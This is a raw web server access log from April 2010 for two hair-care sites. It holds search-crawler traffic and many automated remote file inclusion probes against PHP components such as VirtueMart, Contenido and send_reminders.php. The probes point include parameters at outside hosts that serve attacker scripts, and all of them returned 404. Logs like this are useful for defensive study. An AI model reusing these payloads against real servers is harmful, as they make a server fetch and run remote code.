121.190.102.21 - - [26/Apr/2010:17:54:43 -0700] "GET //bbs//write_update.php?board_skin_path=http://sabong.es.kr/~sb2007/bbs/data/grade4/1259283009/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:17:55:54 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13449 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:17:59:49 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14936 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
91.205.96.19 - - [26/Apr/2010:18:02:54 -0700] "GET / HTTP/1.1" 200 926 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.freehairsecrets.com"
91.205.96.19 - - [26/Apr/2010:18:02:55 -0700] "GET /?N=D HTTP/1.0" 200 910 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.freehairsecrets.com"
91.205.96.19 - - [26/Apr/2010:18:02:55 -0700] "GET /?M=A HTTP/1.1" 200 926 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.freehairsecrets.com"
91.205.96.19 - - [26/Apr/2010:18:02:55 -0700] "GET /?S=A HTTP/1.1" 200 926 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.freehairsecrets.com"
91.205.96.19 - - [26/Apr/2010:18:02:56 -0700] "GET /?D=A HTTP/1.1" 200 926 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.freehairsecrets.com"
91.205.96.19 - - [26/Apr/2010:18:02:57 -0700] "GET /freehairsecretsphp/ HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.freehairsecrets.com"
91.205.96.19 - - [26/Apr/2010:18:02:58 -0700] "GET /logs/ HTTP/1.1" 200 4942 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.freehairsecrets.com"
91.205.96.19 - - [26/Apr/2010:18:02:58 -0700] "GET /tmp/ HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.freehairsecrets.com"
91.205.96.19 - - [26/Apr/2010:18:02:59 -0700] "GET /?N=A HTTP/1.1" 200 926 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.freehairsecrets.com"
91.205.96.19 - - [26/Apr/2010:18:02:59 -0700] "GET /?M=D HTTP/1.1" 200 926 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.freehairsecrets.com"
91.205.96.19 - - [26/Apr/2010:18:02:59 -0700] "GET /?S=D HTTP/1.1" 200 926 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.freehairsecrets.com"
91.205.96.19 - - [26/Apr/2010:18:03:00 -0700] "GET /?D=D HTTP/1.1" 200 926 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.freehairsecrets.com"
91.205.96.19 - - [26/Apr/2010:18:03:00 -0700] "GET /logs/?N=D HTTP/1.1" 200 4942 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.freehairsecrets.com"
91.205.96.19 - - [26/Apr/2010:18:03:00 -0700] "GET /logs/?M=A HTTP/1.1" 200 4942 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.freehairsecrets.com"
91.205.96.19 - - [26/Apr/2010:18:03:01 -0700] "GET /logs/?S=A HTTP/1.1" 200 4942 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.freehairsecrets.com"
91.205.96.19 - - [26/Apr/2010:18:03:01 -0700] "GET /logs/?D=A HTTP/1.1" 200 4942 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.freehairsecrets.com"
91.205.96.19 - - [26/Apr/2010:18:03:01 -0700] "GET /logs/?D=D HTTP/1.1" 200 4942 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.freehairsecrets.com"
91.205.96.19 - - [26/Apr/2010:18:03:03 -0700] "GET /tmp/?D=A HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.freehairsecrets.com"
91.205.96.19 - - [26/Apr/2010:18:03:03 -0700] "GET /logs/?S=D HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.freehairsecrets.com"
91.205.96.19 - - [26/Apr/2010:18:03:03 -0700] "GET /logs/?N=A HTTP/1.1" 200 4942 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.freehairsecrets.com"
91.205.96.19 - - [26/Apr/2010:18:03:03 -0700] "GET /tmp/?M=A HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.freehairsecrets.com"
91.205.96.19 - - [26/Apr/2010:18:03:04 -0700] "GET /tmp/?S=A HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.freehairsecrets.com"
91.205.96.19 - - [26/Apr/2010:18:03:04 -0700] "GET /tmp/?M=D HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.freehairsecrets.com"
91.205.96.19 - - [26/Apr/2010:18:03:05 -0700] "GET /logs/?M=D HTTP/1.1" 200 4942 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.freehairsecrets.com"
91.205.96.19 - - [26/Apr/2010:18:03:06 -0700] "GET /tmp/?D=D HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.freehairsecrets.com"
91.205.96.19 - - [26/Apr/2010:18:03:06 -0700] "GET /tmp/?S=D HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.freehairsecrets.com"
91.205.96.19 - - [26/Apr/2010:18:03:06 -0700] "GET /tmp/?N=A HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.freehairsecrets.com"
91.205.96.19 - - [26/Apr/2010:18:03:07 -0700] "GET /tmp/?N=D HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:18:03:28 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13370 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
75.120.58.176 - - [26/Apr/2010:18:06:37 -0700] "GET /logs/access.log/send_reminders.php?includedir=http://www.wtsmith.co.uk/media/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
75.120.58.176 - - [26/Apr/2010:18:06:38 -0700] "GET /send_reminders.php?includedir=http://www.wtsmith.co.uk/media/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
75.120.58.176 - - [26/Apr/2010:18:06:38 -0700] "GET /logs/send_reminders.php?includedir=http://www.wtsmith.co.uk/media/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:18:07:04 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14529 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:18:10:58 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13829 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:18:14:20 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12999 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:18:18:05 -0700] "GET /freehairsecretsphp/viewtopic.php?p=18931 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
124.49.100.254 - - [26/Apr/2010:18:20:43 -0700] "GET /send_reminders.php?includedir=http://danangportvn.com:32000//Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
124.49.100.254 - - [26/Apr/2010:18:20:43 -0700] "GET /logs/send_reminders.php?includedir=http://danangportvn.com:32000//Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
124.49.100.254 - - [26/Apr/2010:18:20:43 -0700] "GET /logs/access.log/send_reminders.php?includedir=http://danangportvn.com:32000//Ckrid1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:18:21:11 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14102 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
211.180.203.200 - - [26/Apr/2010:18:22:05 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://hd-win.com/articles/ssh/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.180.203.200 - - [26/Apr/2010:18:22:05 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://hd-win.com/articles/ssh/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.180.203.200 - - [26/Apr/2010:18:22:25 -0700] "GET /logs/access.log/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://hd-win.com/articles/ssh/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.92.94.85 - - [26/Apr/2010:18:22:45 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&http://77.92.94.85/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
77.92.94.85 - - [26/Apr/2010:18:22:45 -0700] "GET /logs/access_091123.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&http://77.92.94.85/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
77.92.94.85 - - [26/Apr/2010:18:22:45 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&http://77.92.94.85/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
77.92.94.85 - - [26/Apr/2010:18:26:14 -0700] "GET /logs/access_091123.log%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&http://77.92.94.85/echos.txt?? HTTP/1.0" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
87.106.42.197 - - [26/Apr/2010:18:29:53 -0700] "GET /logs/access_100412.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.intoy1004.co.kr/bbs/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
87.106.42.197 - - [26/Apr/2010:18:29:53 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.intoy1004.co.kr/bbs/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
87.106.42.197 - - [26/Apr/2010:18:29:54 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.intoy1004.co.kr/bbs/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:18:30:20 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12245 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
83.148.64.145 - - [26/Apr/2010:18:32:30 -0700] "GET /logs/access_100412.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.intoy1004.co.kr/bbs/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
83.148.64.145 - - [26/Apr/2010:18:32:30 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.intoy1004.co.kr/bbs/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
83.148.64.145 - - [26/Apr/2010:18:32:30 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.intoy1004.co.kr/bbs/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
119.235.237.86 - - [26/Apr/2010:18:33:25 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "freehairsecrets.com"
119.235.237.86 - - [26/Apr/2010:18:33:29 -0700] "GET /freehairsecretsphp/viewtopic.php?p=10229 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:18:33:37 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12907 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
67.222.152.66 - - [26/Apr/2010:18:34:46 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:18:34:46 -0700] "GET /logs/access_091012.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:18:34:46 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:18:35:17 -0700] "GET /logs/access.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:18:35:17 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:18:35:17 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:18:35:40 -0700] "GET /logs/access_100412.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:18:35:49 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:18:35:49 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:18:35:49 -0700] "GET /logs/access.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:18:36:01 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:18:36:01 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:18:36:01 -0700] "GET /logs/access.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:18:36:11 -0700] "GET /logs/access_100412.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:18:36:19 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.222.152.66 - - [26/Apr/2010:18:36:19 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.222.152.66 - - [26/Apr/2010:18:36:19 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.222.152.66 - - [26/Apr/2010:18:36:19 -0700] "GET /logs/access_100412.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:18:37:16 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:18:37:16 -0700] "GET /logs/access_091012.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:18:37:16 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:18:37:21 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12242 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
67.205.1.227 - - [26/Apr/2010:18:37:53 -0700] "GET /logs/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.205.1.227 - - [26/Apr/2010:18:37:53 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.205.1.227 - - [26/Apr/2010:18:37:53 -0700] "GET /logs/access.log%20%20/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://telleriasnunez.com/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:18:37:56 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:18:37:56 -0700] "GET /logs/access_100308.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:18:37:56 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.205.1.227 - - [26/Apr/2010:18:38:01 -0700] "GET /logs/access_100412.log%20%20/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:18:38:11 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:18:38:11 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:18:38:14 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:18:38:14 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:18:38:14 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:18:38:14 -0700] "GET /logs/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:18:38:14 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:18:38:14 -0700] "GET /logs/access.log%20%20/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:18:38:15 -0700] "GET /logs/access_100329.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:18:38:18 -0700] "GET /logs/access_100329.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:18:38:24 -0700] "GET /logs/access_100412.log%20%20/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:18:38:34 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:18:38:34 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:18:38:38 -0700] "GET /logs/access_100329.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:18:39:12 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:18:39:12 -0700] "GET /logs/access_100308.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:18:39:12 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:18:39:33 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:18:39:48 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:18:39:48 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:18:39:48 -0700] "GET /logs/access_100308.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:18:40:06 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:18:41:06 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15170 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
67.222.152.66 - - [26/Apr/2010:18:41:16 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:18:41:16 -0700] "GET /logs/access_091012.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:18:41:16 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:18:41:21 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
